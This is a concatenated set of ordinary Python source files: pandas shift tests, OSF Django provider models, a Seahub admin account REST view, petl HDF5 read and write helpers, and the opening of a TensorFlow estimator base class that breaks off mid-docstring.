shifted2 = datetime_frame.tshift(freq=datetime_frame.index.freq)
tm.assert_frame_equal(shifted, shifted2)
inferred_ts = DataFrame(
datetime_frame.values,
Index(np.asarray(datetime_frame.index)),
columns=datetime_frame.columns,
)
shifted = inferred_ts.tshift(1)
expected = datetime_frame.tshift(1)
expected.index = expected.index._with_freq(None)
tm.assert_frame_equal(shifted, expected)
unshifted = shifted.tshift(-1)
tm.assert_frame_equal(unshifted, inferred_ts)
no_freq = datetime_frame.iloc[[0, 5, 7], :]
msg = "Freq was not set in the index hence cannot be inferred"
with pytest.raises(ValueError, match=msg):
no_freq.tshift()
def test_tshift_deprecated(self, datetime_frame):
# GH#11631
with tm.assert_produces_warning(FutureWarning):
datetime_frame.tshift()
def test_period_index_frame_shift_with_freq(self):
ps = tm.makePeriodFrame()
shifted = ps.shift(1, freq="infer")
unshifted = shifted.shift(-1, freq="infer")
tm.assert_frame_equal(unshifted, ps)
shifted2 = ps.shift(freq="B")
tm.assert_frame_equal(shifted, shifted2)
shifted3 = ps.shift(freq=offsets.BDay())
tm.assert_frame_equal(shifted, shifted3)
def test_datetime_frame_shift_with_freq(self, datetime_frame):
shifted = datetime_frame.shift(1, freq="infer")
unshifted = shifted.shift(-1, freq="infer")
tm.assert_frame_equal(datetime_frame, unshifted)
shifted2 = datetime_frame.shift(freq=datetime_frame.index.freq)
tm.assert_frame_equal(shifted, shifted2)
inferred_ts = DataFrame(
datetime_frame.values,
Index(np.asarray(datetime_frame.index)),
columns=datetime_frame.columns,
)
shifted = inferred_ts.shift(1, freq="infer")
expected = datetime_frame.shift(1, freq="infer")
expected.index = expected.index._with_freq(None)
tm.assert_frame_equal(shifted, expected)
unshifted = shifted.shift(-1, freq="infer")
tm.assert_frame_equal(unshifted, inferred_ts)
def test_period_index_frame_shift_with_freq_error(self):
ps = tm.makePeriodFrame()
msg = "Given freq M does not match PeriodIndex freq B"
with pytest.raises(ValueError, match=msg):
ps.shift(freq="M")
def test_datetime_frame_shift_with_freq_error(self, datetime_frame):
no_freq = datetime_frame.iloc[[0, 5, 7], :]
msg = "Freq was not set in the index hence cannot be inferred"
with pytest.raises(ValueError, match=msg):
no_freq.shift(freq="infer")
@td.skip_array_manager_not_yet_implemented # TODO(ArrayManager) axis=1 support
def test_shift_dt64values_int_fill_deprecated(self):
# GH#31971
ser = Series([pd.Timestamp("2020-01-01"), pd.Timestamp("2020-01-02")])
df = ser.to_frame()
with tm.assert_produces_warning(FutureWarning):
result = df.shift(1, fill_value=0)
expected = Series([pd.Timestamp(0), ser[0]]).to_frame()
tm.assert_frame_equal(result, expected)
# axis = 1
df2 = DataFrame({"A": ser, "B": ser})
df2._consolidate_inplace()
with tm.assert_produces_warning(FutureWarning):
result = df2.shift(1, axis=1, fill_value=0)
expected = DataFrame({"A": [pd.Timestamp(0), pd.Timestamp(0)], "B": df2["A"]})
tm.assert_frame_equal(result, expected)
def test_shift_axis1_categorical_columns(self):
# GH#38434
ci = CategoricalIndex(["a", "b", "c"])
df = DataFrame(
{"a": [1, 3], "b": [2, 4], "c": [5, 6]}, index=ci[:-1], columns=ci
)
result = df.shift(axis=1)
expected = DataFrame(
{"a": [np.nan, np.nan], "b": [1, 3], "c": [2, 4]}, index=ci[:-1], columns=ci
)
tm.assert_frame_equal(result, expected)
# periods != 1
result = df.shift(2, axis=1)
expected = DataFrame(
{"a": [np.nan, np.nan], "b": [np.nan, np.nan], "c": [1, 3]},
index=ci[:-1],
columns=ci,
)
tm.assert_frame_equal(result, expected)
| |
# -*- coding: utf-8 -*-
from django.apps import apps
from django.contrib.postgres import fields
from typedmodels.models import TypedModel
from api.taxonomies.utils import optimize_subject_query
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from dirtyfields import DirtyFieldsMixin
from guardian.models import GroupObjectPermissionBase, UserObjectPermissionBase
from framework import sentry
from osf.models.base import BaseModel, TypedObjectIDMixin
from osf.models.licenses import NodeLicense
from osf.models.mixins import ReviewProviderMixin
from osf.models.storage import ProviderAssetFile
from osf.models.subject import Subject
from osf.models.notifications import NotificationSubscription
from osf.utils.datetime_aware_jsonfield import DateTimeAwareJSONField
from osf.utils.fields import EncryptedTextField
from osf.utils.permissions import REVIEW_PERMISSIONS
from website import settings
from website.util import api_v2_url
from functools import reduce
class AbstractProvider(TypedModel, TypedObjectIDMixin, ReviewProviderMixin, DirtyFieldsMixin, BaseModel):
class Meta:
unique_together = ('_id', 'type')
permissions = REVIEW_PERMISSIONS
primary_collection = models.ForeignKey('Collection', related_name='+',
null=True, blank=True, on_delete=models.SET_NULL)
name = models.CharField(null=False, max_length=128) # max length on prod: 22
advisory_board = models.TextField(default='', blank=True)
description = models.TextField(default='', blank=True)
domain = models.URLField(blank=True, default='', max_length=200)
domain_redirect_enabled = models.BooleanField(default=False)
external_url = models.URLField(null=True, blank=True, max_length=200) # max length on prod: 25
email_contact = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 23
email_support = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 23
social_twitter = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 8
social_facebook = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 8
social_instagram = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 8
footer_links = models.TextField(default='', blank=True)
facebook_app_id = models.BigIntegerField(blank=True, null=True)
example = models.CharField(null=True, blank=True, max_length=20) # max length on prod: 5
licenses_acceptable = models.ManyToManyField(NodeLicense, blank=True, related_name='licenses_acceptable')
default_license = models.ForeignKey(NodeLicense, related_name='default_license',
null=True, blank=True, on_delete=models.CASCADE)
allow_submissions = models.BooleanField(default=True)
allow_commenting = models.BooleanField(default=False)
def __repr__(self):
return ('(name={self.name!r}, default_license={self.default_license!r}, '
'allow_submissions={self.allow_submissions!r}) with id {self.id!r}').format(self=self)
def __unicode__(self):
return '[{}] {} - {}'.format(self.readable_type, self.name, self.id)
@property
def all_subjects(self):
if self.subjects.exists():
return self.subjects.all()
return Subject.objects.filter(
provider___id='osf',
provider__type='osf.preprintprovider',
)
@property
def has_highlighted_subjects(self):
return self.subjects.filter(highlighted=True).exists()
@property
def highlighted_subjects(self):
if self.has_highlighted_subjects:
return self.subjects.filter(highlighted=True).order_by('text')[:10]
else:
return sorted(self.top_level_subjects, key=lambda s: s.text)[:10]
@property
def top_level_subjects(self):
if self.subjects.exists():
return optimize_subject_query(self.subjects.filter(parent__isnull=True))
return optimize_subject_query(Subject.objects.filter(
parent__isnull=True,
provider___id='osf',
provider__type='osf.preprintprovider',
))
@property
def readable_type(self):
raise NotImplementedError
def get_asset_url(self, name):
""" Helper that returns an associated ProviderAssetFile's url, or None
:param str name: Name to perform lookup by
:returns str|None: url of file
"""
try:
return self.asset_files.get(name=name).file.url
except ProviderAssetFile.DoesNotExist:
return None
class CollectionProvider(AbstractProvider):
class Meta:
permissions = (
# custom permissions for use in the OSF Admin App
('view_collectionprovider', 'Can view collection provider details'),
)
@property
def readable_type(self):
return 'collection'
def get_absolute_url(self):
return self.absolute_api_v2_url
@property
def absolute_api_v2_url(self):
path = '/providers/collections/{}/'.format(self._id)
return api_v2_url(path)
class RegistrationProvider(AbstractProvider):
class Meta:
permissions = (
# custom permissions for use in the OSF Admin App
('view_registrationprovider', 'Can view registration provider details'),
)
@property
def readable_type(self):
return 'registration'
def get_absolute_url(self):
return self.absolute_api_v2_url
@property
def absolute_api_v2_url(self):
path = '/providers/registrations/{}/'.format(self._id)
return api_v2_url(path)
class PreprintProvider(AbstractProvider):
PUSH_SHARE_TYPE_CHOICES = (('Preprint', 'Preprint'),
('Thesis', 'Thesis'),)
PUSH_SHARE_TYPE_HELP = 'This SHARE type will be used when pushing publications to SHARE'
REVIEWABLE_RELATION_NAME = 'preprint_services'
share_publish_type = models.CharField(choices=PUSH_SHARE_TYPE_CHOICES,
default='Preprint',
help_text=PUSH_SHARE_TYPE_HELP,
max_length=32)
share_source = models.CharField(blank=True, max_length=200)
share_title = models.TextField(default='', blank=True)
additional_providers = fields.ArrayField(models.CharField(max_length=200), default=list, blank=True)
access_token = EncryptedTextField(null=True, blank=True)
doi_prefix = models.CharField(blank=True, max_length=32)
PREPRINT_WORD_CHOICES = (
('preprint', 'Preprint'),
('paper', 'Paper'),
('thesis', 'Thesis'),
('work', 'Work'),
('none', 'None')
)
preprint_word = models.CharField(max_length=10, choices=PREPRINT_WORD_CHOICES, default='preprint')
subjects_acceptable = DateTimeAwareJSONField(blank=True, default=list)
class Meta:
permissions = (
# custom permissions for use in the OSF Admin App
('view_preprintprovider', 'Can view preprint provider details'),
)
@property
def readable_type(self):
return 'preprint'
@property
def all_subjects(self):
if self.subjects.exists():
return self.subjects.all()
else:
# TODO: Delet this when all PreprintProviders have a mapping
return rules_to_subjects(self.subjects_acceptable)
@property
def has_highlighted_subjects(self):
return self.subjects.filter(highlighted=True).exists()
@property
def highlighted_subjects(self):
if self.has_highlighted_subjects:
return self.subjects.filter(highlighted=True).order_by('text')[:10]
else:
return sorted(self.top_level_subjects, key=lambda s: s.text)[:10]
@property
def top_level_subjects(self):
if self.subjects.exists():
return optimize_subject_query(self.subjects.filter(parent__isnull=True))
else:
# TODO: Delet this when all PreprintProviders have a mapping
if len(self.subjects_acceptable) == 0:
return optimize_subject_query(Subject.objects.filter(parent__isnull=True, provider___id='osf'))
tops = set([sub[0][0] for sub in self.subjects_acceptable])
return [Subject.load(sub) for sub in tops]
@property
def landing_url(self):
return self.domain if self.domain else '{}preprints/{}'.format(settings.DOMAIN, self._id)
def get_absolute_url(self):
return '{}preprint_providers/{}'.format(self.absolute_api_v2_url, self._id)
@property
def absolute_api_v2_url(self):
path = '/providers/preprints/{}/'.format(self._id)
return api_v2_url(path)
def rules_to_subjects(rules):
if not rules:
return Subject.objects.filter(provider___id='osf', provider__type='osf.preprintprovider')
q = []
for rule in rules:
parent_from_rule = Subject.load(rule[0][-1])
if rule[1]:
q.append(models.Q(parent=parent_from_rule))
if len(rule[0]) == 1:
potential_parents = Subject.objects.filter(parent=parent_from_rule)
for parent in potential_parents:
q.append(models.Q(parent=parent))
for sub in rule[0]:
q.append(models.Q(_id=sub))
return Subject.objects.filter(reduce(lambda x, y: x | y, q)) if len(q) > 1 else (Subject.objects.filter(q[0]) if len(q) else Subject.objects.filter(provider___id='osf', provider__type='osf.preprintprovider'))
@receiver(post_save, sender=PreprintProvider)
def create_provider_auth_groups(sender, instance, created, **kwargs):
if created:
instance.update_group_permissions()
@receiver(post_save, sender=PreprintProvider)
def create_provider_notification_subscriptions(sender, instance, created, **kwargs):
if created:
NotificationSubscription.objects.get_or_create(
_id='{provider_id}_new_pending_submissions'.format(provider_id=instance._id),
event_name='new_pending_submissions',
provider=instance
)
@receiver(post_save, sender=CollectionProvider)
@receiver(post_save, sender=RegistrationProvider)
def create_primary_collection_for_provider(sender, instance, created, **kwargs):
if created:
Collection = apps.get_model('osf.Collection')
user = getattr(instance, '_creator', None) # Temp attr set in admin view
if user:
c = Collection(
title='{}\'s Collection'.format(instance.name),
creator=user,
provider=instance,
is_promoted=True,
is_public=True
)
c.save()
instance.primary_collection = c
instance.save()
else:
# A user is required for Collections / Groups
sentry.log_message('Unable to create primary_collection for {}Provider {}'.format(instance.readable_type.capitalize(), instance.name))
class WhitelistedSHAREPreprintProvider(BaseModel):
id = models.AutoField(primary_key=True)
provider_name = models.CharField(unique=True, max_length=200)
def __unicode__(self):
return self.provider_name
class AbstractProviderUserObjectPermission(UserObjectPermissionBase):
content_object = models.ForeignKey(AbstractProvider, on_delete=models.CASCADE)
class AbstractProviderGroupObjectPermission(GroupObjectPermissionBase):
content_object = models.ForeignKey(AbstractProvider, on_delete=models.CASCADE)
| |
import logging
from dateutil.relativedelta import relativedelta
from django.utils import timezone
from rest_framework import status
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAdminUser
from rest_framework.response import Response
from rest_framework.reverse import reverse
from rest_framework.views import APIView
import seaserv
from seaserv import seafile_api, ccnet_threaded_rpc
from pysearpc import SearpcError
from seahub.api2.authentication import TokenAuthentication
from seahub.api2.serializers import AccountSerializer
from seahub.api2.throttling import UserRateThrottle
from seahub.api2.utils import api_error, to_python_boolean
from seahub.api2.status import HTTP_520_OPERATION_FAILED
from seahub.base.accounts import User
from seahub.profile.models import Profile
from seahub.profile.utils import refresh_cache as refresh_profile_cache
from seahub.utils import is_valid_username
logger = logging.getLogger(__name__)
json_content_type = 'application/json; charset=utf-8'
class Account(APIView):
"""Query/Add/Delete a specific account.
Administator permission is required.
"""
authentication_classes = (TokenAuthentication, SessionAuthentication)
permission_classes = (IsAdminUser, )
throttle_classes = (UserRateThrottle, )
def get(self, request, email, format=None):
if not is_valid_username(email):
return api_error(status.HTTP_400_BAD_REQUEST, 'Email %s invalid.' % email)
# query account info
try:
user = User.objects.get(email=email)
except User.DoesNotExist:
return api_error(status.HTTP_404_NOT_FOUND, 'User %s not found.' % email)
info = {}
info['email'] = user.email
info['id'] = user.id
info['is_staff'] = user.is_staff
info['is_active'] = user.is_active
info['create_time'] = user.ctime
info['total'] = seafile_api.get_user_quota(email)
info['usage'] = seafile_api.get_user_self_usage(email)
return Response(info)
def _update_account_profile(self, request, email):
name = request.data.get("name", None)
note = request.data.get("note", None)
if name is None and note is None:
return
profile = Profile.objects.get_profile_by_user(email)
if profile is None:
profile = Profile(user=email)
if name is not None:
# if '/' in name:
# return api_error(status.HTTP_400_BAD_REQUEST, "Nickname should not include '/'")
profile.nickname = name
if note is not None:
profile.intro = note
profile.save()
def _update_account_quota(self, request, email):
storage = request.data.get("storage", None)
sharing = request.data.get("sharing", None)
if storage is None and sharing is None:
return
if storage is not None:
seafile_api.set_user_quota(email, int(storage))
# if sharing is not None:
# seafile_api.set_user_share_quota(email, int(sharing))
def _create_account(self, request, email):
copy = request.data.copy()
copy['email'] = email
serializer = AccountSerializer(data=copy)
if serializer.is_valid():
try:
user = User.objects.create_user(serializer.data['email'],
serializer.data['password'],
serializer.data['is_staff'],
serializer.data['is_active'])
except User.DoesNotExist as e:
logger.error(e)
return api_error(status.HTTP_520_OPERATION_FAILED,
'Failed to add user.')
self._update_account_profile(request, user.username)
resp = Response('success', status=status.HTTP_201_CREATED)
resp['Location'] = reverse('api2-account', args=[email])
return resp
else:
return api_error(status.HTTP_400_BAD_REQUEST, serializer.errors)
def _update_account(self, request, user):
password = request.data.get("password", None)
is_staff = request.data.get("is_staff", None)
if is_staff is not None:
try:
is_staff = to_python_boolean(is_staff)
except ValueError:
return api_error(status.HTTP_400_BAD_REQUEST,
'is_staff invalid.')
is_active = request.data.get("is_active", None)
if is_active is not None:
try:
is_active = to_python_boolean(is_active)
except ValueError:
return api_error(status.HTTP_400_BAD_REQUEST,
'is_active invalid.')
if password is not None:
user.set_password(password)
if is_staff is not None:
user.is_staff = is_staff
if is_active is not None:
user.is_active = is_active
result_code = user.save()
if result_code == -1:
return api_error(status.HTTP_520_OPERATION_FAILED,
'Failed to update user.')
self._update_account_profile(request, user.username)
try:
self._update_account_quota(request, user.username)
except SearpcError as e:
logger.error(e)
return api_error(HTTP_520_OPERATION_FAILED, 'Failed to set user quota.')
is_trial = request.data.get("is_trial", None)
if is_trial is not None:
try:
from seahub_extra.trialaccount.models import TrialAccount
except ImportError:
pass
else:
try:
is_trial = to_python_boolean(is_trial)
except ValueError:
return api_error(status.HTTP_400_BAD_REQUEST,
'is_trial invalid')
if is_trial is True:
expire_date = timezone.now() + relativedelta(days=7)
TrialAccount.object.create_or_update(user.username,
expire_date)
else:
TrialAccount.objects.filter(user_or_org=user.username).delete()
return Response('success')
def post(self, request, email, format=None):
# migrate an account's repos and groups to an exist account
if not is_valid_username(email):
return api_error(status.HTTP_400_BAD_REQUEST, 'Email %s invalid.' % email)
op = request.data.get('op', '').lower()
if op == 'migrate':
from_user = email
to_user = request.data.get('to_user', '')
if not is_valid_username(to_user):
return api_error(status.HTTP_400_BAD_REQUEST, 'Email %s invalid.' % to_user)
try:
user2 = User.objects.get(email=to_user)
except User.DoesNotExist:
return api_error(status.HTTP_404_NOT_FOUND, 'User %s not found.' % to_user)
# transfer owned repos to new user
for r in seafile_api.get_owned_repo_list(from_user):
seafile_api.set_repo_owner(r.id, user2.username)
# transfer joined groups to new user
for g in seaserv.get_personal_groups_by_user(from_user):
if not seaserv.is_group_user(g.id, user2.username):
# add new user to the group on behalf of the group creator
ccnet_threaded_rpc.group_add_member(g.id, g.creator_name,
to_user)
if from_user == g.creator_name:
ccnet_threaded_rpc.set_group_creator(g.id, to_user)
return Response("success")
else:
return api_error(status.HTTP_400_BAD_REQUEST, 'op can only be migrate.')
def put(self, request, email, format=None):
if not is_valid_username(email):
return api_error(status.HTTP_400_BAD_REQUEST, 'Email %s invalid.' % email)
try:
user = User.objects.get(email=email)
return self._update_account(request, user)
except User.DoesNotExist:
return self._create_account(request, email)
def delete(self, request, email, format=None):
if not is_valid_username(email):
return api_error(status.HTTP_400_BAD_REQUEST, 'Email %s invalid.' % email)
# delete account
try:
user = User.objects.get(email=email)
user.delete()
return Response("success")
except User.DoesNotExist:
resp = Response("success", status=status.HTTP_202_ACCEPTED)
return resp
| |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, division
from contextlib import contextmanager
from petl.compat import string_types
from petl.errors import ArgumentError
from petl.util.base import Table, iterpeek, data
from petl.io.numpy import infer_dtype
def fromhdf5(source, where=None, name=None, condition=None,
condvars=None, start=None, stop=None, step=None):
"""
Provides access to an HDF5 table. E.g.::
>>> import petl as etl
>>> import tables
>>> # set up a new hdf5 table to demonstrate with
... h5file = tables.open_file('example.h5', mode='w',
... title='Example file')
>>> h5file.create_group('/', 'testgroup', 'Test Group')
/testgroup (Group) 'Test Group'
children := []
>>> class FooBar(tables.IsDescription):
... foo = tables.Int32Col(pos=0)
... bar = tables.StringCol(6, pos=2)
...
>>> h5table = h5file.create_table('/testgroup', 'testtable', FooBar,
... 'Test Table')
>>> # load some data into the table
... table1 = (('foo', 'bar'),
... (1, b'asdfgh'),
... (2, b'qwerty'),
... (3, b'zxcvbn'))
>>> for row in table1[1:]:
... for i, f in enumerate(table1[0]):
... h5table.row[f] = row[i]
... h5table.row.append()
...
>>> h5file.flush()
>>> h5file.close()
>>> #
... # now demonstrate use of fromhdf5
... table1 = etl.fromhdf5('example.h5', '/testgroup', 'testtable')
>>> table1
+-----+-----------+
| foo | bar |
+=====+===========+
| 1 | b'asdfgh' |
+-----+-----------+
| 2 | b'qwerty' |
+-----+-----------+
| 3 | b'zxcvbn' |
+-----+-----------+
>>> # alternatively just specify path to table node
... table1 = etl.fromhdf5('example.h5', '/testgroup/testtable')
>>> # ...or use an existing tables.File object
... h5file = tables.open_file('example.h5')
>>> table1 = etl.fromhdf5(h5file, '/testgroup/testtable')
>>> # ...or use an existing tables.Table object
... h5tbl = h5file.get_node('/testgroup/testtable')
>>> table1 = etl.fromhdf5(h5tbl)
>>> # use a condition to filter data
... table2 = etl.fromhdf5(h5tbl, condition='foo < 3')
>>> table2
+-----+-----------+
| foo | bar |
+=====+===========+
| 1 | b'asdfgh' |
+-----+-----------+
| 2 | b'qwerty' |
+-----+-----------+
>>> h5file.close()
"""
return HDF5View(source, where=where, name=name,
condition=condition, condvars=condvars,
start=start, stop=stop, step=step)
class HDF5View(Table):
def __init__(self, source, where=None, name=None, condition=None,
condvars=None, start=None, stop=None, step=None):
self.source = source
self.where = where
self.name = name
self.condition = condition
self.condvars = condvars
self.start = start
self.stop = stop
self.step = step
def __iter__(self):
return iterhdf5(self.source, self.where, self.name, self.condition,
self.condvars, self.start, self.stop, self.step)
@contextmanager
def _get_hdf5_table(source, where, name, mode='r'):
import tables
needs_closing = False
h5file = None
# allow for polymorphic args
if isinstance(source, tables.Table):
# source is a table
h5tbl = source
elif isinstance(source, string_types):
# assume source is the name of an HDF5 file, try to open it
h5file = tables.open_file(source, mode=mode)
needs_closing = True
h5tbl = h5file.get_node(where, name=name)
elif isinstance(source, tables.File):
# source is an HDF5 file object
h5file = source
h5tbl = h5file.get_node(where, name=name)
else:
# invalid source
raise ArgumentError('invalid source argument, expected file name or '
'tables.File or tables.Table object, found: %r'
% source)
try:
yield h5tbl
finally:
# tidy up
if needs_closing:
h5file.close()
@contextmanager
def _get_hdf5_file(source, mode='r'):
import tables
needs_closing = False
# allow for polymorphic args
if isinstance(source, string_types):
# assume source is the name of an HDF5 file, try to open it
h5file = tables.open_file(source, mode=mode)
needs_closing = True
elif isinstance(source, tables.File):
# source is an HDF5 file object
h5file = source
else:
# invalid source
raise ArgumentError('invalid source argument, expected file name or '
'tables.File object, found: %r' % source)
try:
yield h5file
finally:
if needs_closing:
h5file.close()
def iterhdf5(source, where, name, condition, condvars, start, stop, step):
with _get_hdf5_table(source, where, name) as h5tbl:
# header row
hdr = tuple(h5tbl.colnames)
yield hdr
# determine how to iterate over the table
if condition is not None:
it = h5tbl.where(condition, condvars=condvars,
start=start, stop=stop, step=step)
else:
it = h5tbl.iterrows(start=start, stop=stop, step=step)
# data rows
for row in it:
yield row[:] # access row as a tuple
def fromhdf5sorted(source, where=None, name=None, sortby=None, checkCSI=False,
start=None, stop=None, step=None):
"""
Provides access to an HDF5 table, sorted by an indexed column, e.g.::
>>> import petl as etl
>>> import tables
>>> # set up a new hdf5 table to demonstrate with
... h5file = tables.open_file('example.h5', mode='w', title='Test file')
>>> h5file.create_group('/', 'testgroup', 'Test Group')
/testgroup (Group) 'Test Group'
children := []
>>> class FooBar(tables.IsDescription):
... foo = tables.Int32Col(pos=0)
... bar = tables.StringCol(6, pos=2)
...
>>> h5table = h5file.create_table('/testgroup', 'testtable', FooBar, 'Test Table')
>>> # load some data into the table
... table1 = (('foo', 'bar'),
... (3, b'asdfgh'),
... (2, b'qwerty'),
... (1, b'zxcvbn'))
>>> for row in table1[1:]:
... for i, f in enumerate(table1[0]):
... h5table.row[f] = row[i]
... h5table.row.append()
...
>>> h5table.cols.foo.create_csindex() # CS index is required
0
>>> h5file.flush()
>>> h5file.close()
>>> #
... # access the data, sorted by the indexed column
... table2 = etl.fromhdf5sorted('example.h5', '/testgroup', 'testtable',
... sortby='foo')
>>> table2
+-----+-----------+
| foo | bar |
+=====+===========+
| 1 | b'zxcvbn' |
+-----+-----------+
| 2 | b'qwerty' |
+-----+-----------+
| 3 | b'asdfgh' |
+-----+-----------+
"""
assert sortby is not None, 'no column specified to sort by'
return HDF5SortedView(source, where=where, name=name,
sortby=sortby, checkCSI=checkCSI,
start=start, stop=stop, step=step)
class HDF5SortedView(Table):
def __init__(self, source, where=None, name=None, sortby=None,
checkCSI=False, start=None, stop=None, step=None):
self.source = source
self.where = where
self.name = name
self.sortby = sortby
self.checkCSI = checkCSI
self.start = start
self.stop = stop
self.step = step
def __iter__(self):
return iterhdf5sorted(self.source, self.where, self.name, self.sortby,
self.checkCSI, self.start, self.stop, self.step)
def iterhdf5sorted(source, where, name, sortby, checkCSI, start, stop, step):
with _get_hdf5_table(source, where, name) as h5tbl:
# header row
hdr = tuple(h5tbl.colnames)
yield hdr
it = h5tbl.itersorted(sortby,
checkCSI=checkCSI,
start=start,
stop=stop,
step=step)
for row in it:
yield row[:] # access row as a tuple
def tohdf5(table, source, where=None, name=None, create=False, drop=False,
description=None, title='', filters=None, expectedrows=10000,
chunkshape=None, byteorder=None, createparents=False,
sample=1000):
"""
Write to an HDF5 table. If `create` is `False`, assumes the table
already exists, and attempts to truncate it before loading. If `create`
is `True`, a new table will be created, and if `drop` is True,
any existing table will be dropped first. If `description` is `None`,
the description will be guessed. E.g.::
>>> import petl as etl
>>> table1 = (('foo', 'bar'),
... (1, b'asdfgh'),
... (2, b'qwerty'),
... (3, b'zxcvbn'))
>>> etl.tohdf5(table1, 'example.h5', '/testgroup', 'testtable',
... drop=True, create=True, createparents=True)
>>> etl.fromhdf5('example.h5', '/testgroup', 'testtable')
+-----+-----------+
| foo | bar |
+=====+===========+
| 1 | b'asdfgh' |
+-----+-----------+
| 2 | b'qwerty' |
+-----+-----------+
| 3 | b'zxcvbn' |
+-----+-----------+
"""
import tables
it = iter(table)
if create:
with _get_hdf5_file(source, mode='a') as h5file:
if drop:
try:
h5file.get_node(where, name)
except tables.NoSuchNodeError:
pass
else:
h5file.remove_node(where, name)
# determine datatype
if description is None:
peek, it = iterpeek(it, sample)
# use a numpy dtype
description = infer_dtype(peek)
# create the table
h5file.create_table(where, name, description,
title=title,
filters=filters,
expectedrows=expectedrows,
chunkshape=chunkshape,
byteorder=byteorder,
createparents=createparents)
with _get_hdf5_table(source, where, name, mode='a') as h5table:
# truncate the existing table
h5table.truncate(0)
# load the data
_insert(it, h5table)
Table.tohdf5 = tohdf5
def appendhdf5(table, source, where=None, name=None):
"""
As :func:`petl.io.hdf5.tohdf5` but don't truncate the target table before
loading.
"""
with _get_hdf5_table(source, where, name, mode='a') as h5table:
# load the data
_insert(table, h5table)
Table.appendhdf5 = appendhdf5
def _insert(table, h5table):
it = data(table) # don't need header
for row in it:
for i, f in enumerate(h5table.colnames):
# depends on order of fields being the same in input table
# and hd5 table, but field names don't need to match
h5table.row[f] = row[i]
h5table.row.append()
h5table.flush()
| |
"""Base estimator class."""
# Copyright 2015-present The Scikit Flow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import json
import os
import shutil
from six import string_types
import numpy as np
from google.protobuf import text_format
from tensorflow.python.platform import gfile
from tensorflow.python.client import session
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import importer
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops as array_ops_
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import variables
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.training import training as train
from tensorflow.contrib.layers import optimizers
from tensorflow.contrib.learn.python.learn.io.data_feeder import setup_train_data_feeder
from tensorflow.contrib.learn.python.learn.io.data_feeder import setup_predict_data_feeder
from tensorflow.contrib.learn.python.learn.ops.dropout_ops import DROPOUTS
from tensorflow.contrib.learn.python.learn import monitors as monitors_lib
from tensorflow.contrib.learn.python.learn.utils import checkpoints
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.contrib.learn.python.learn.estimators import _sklearn
from tensorflow.contrib.learn.python.learn.estimators._sklearn import NotFittedError
from tensorflow.contrib.learn.python.learn.estimators.run_config import RunConfig
def _write_with_backup(filename, content):
if gfile.Exists(filename):
gfile.Rename(filename, filename + '.old', overwrite=True)
with gfile.Open(filename, 'w') as f:
f.write(content)
def _copy_dir(dir_in, dir_out):
gfile.MakeDirs(dir_out)
for name in gfile.ListDirectory(dir_in):
name_in = os.path.join(dir_in, name)
name_out = os.path.join(dir_out, name)
if gfile.IsDirectory(name_in):
gfile.MakeDirs(name_out)
_copy_dir(name_in, name_out)
else:
gfile.Copy(name_in, name_out, overwrite=True)
def _new_tf_model_fn(model_fn, class_weight):
"""Backward compatibility way of adding class weight and IS_TRAINING.
TODO(ipolosukhin): Remove this function after new layers are available.
Specifically:
* dropout and batch norm should work via update ops.
* class weights should be retrieved from weights column or hparams.
"""
def _model_fn(features, targets, mode):
ops.get_default_graph().add_to_collection('IS_TRAINING', mode == 'train')
if class_weight is not None:
constant_op.constant(class_weight, name='class_weight')
return model_fn(features, targets)
return _model_fn
class TensorFlowEstimator(estimator.Estimator):
"""Base class for all TensorFlow estimators.
Parameters:
model_fn: Model function, that takes input X, y tensors and outputs
prediction and loss tensors.
n_classes: Number of classes in the target.
batch_size: Mini batch size.
steps: Number of steps to run over data.
optimizer: Optimizer name (or class), for example "SGD", "Adam",
"Adagrad".
learning_rate: If this is constant float value, no decay function is used.
Instead, a customized decay function can be passed that accepts
global_step as parameter and returns a Tensor.
e.g. exponential decay function:
def exp_decay(global_step):
return tf.train.exponential_decay(
learning_rate=0.1, global_step,
decay_steps=2, decay_rate=0.001)
clip_gradients: Clip norm of the gradients to this value to stop
gradient explosion.
class_weight: None or list of n_classes floats. Weight associated with
classes for loss computation. If not given, all classes are supposed to
have weight one.
continue_training: when continue_training is True, once initialized
model will be continuely trained on every call of fit.
config: RunConfig object that controls the configurations of the
session, e.g. num_cores, gpu_memory_fraction, etc.
verbose: Controls the verbosity, possible values:
0: the algorithm and debug information is muted.
1: trainer prints the progress.
2: log device placement is printed.
"""
def __init__(self,
model_fn,
n_classes,
batch_size=32,
steps=200,
optimizer='Adagrad',
learning_rate=0.1,
clip_gradients=5.0,
class_weight=None,
continue_training=False,
config=None,
verbose=1):
super(TensorFlowEstimator, self).__init__(
model_fn=_new_tf_model_fn(model_fn, class_weight),
classification=n_classes > 1,
learning_rate=learning_rate,
optimizer=optimizer,
clip_gradients=clip_gradients,
config=config)
self.n_classes = n_classes
self.batch_size = batch_size
self.steps = steps
self.verbose = verbose
self.continue_training = continue_training
self._data_feeder = None
def fit(self, x, y, steps=None, monitors=None, logdir=None):
"""Builds a neural network model given provided `model_fn` and training
data X and y.
Note: called first time constructs the graph and initializers
variables. Consecutives times it will continue training the same model.
This logic follows partial_fit() interface in scikit-learn.
To restart learning, create new estimator.
Args:
x: matrix or tensor of shape [n_samples, n_features...]. Can be
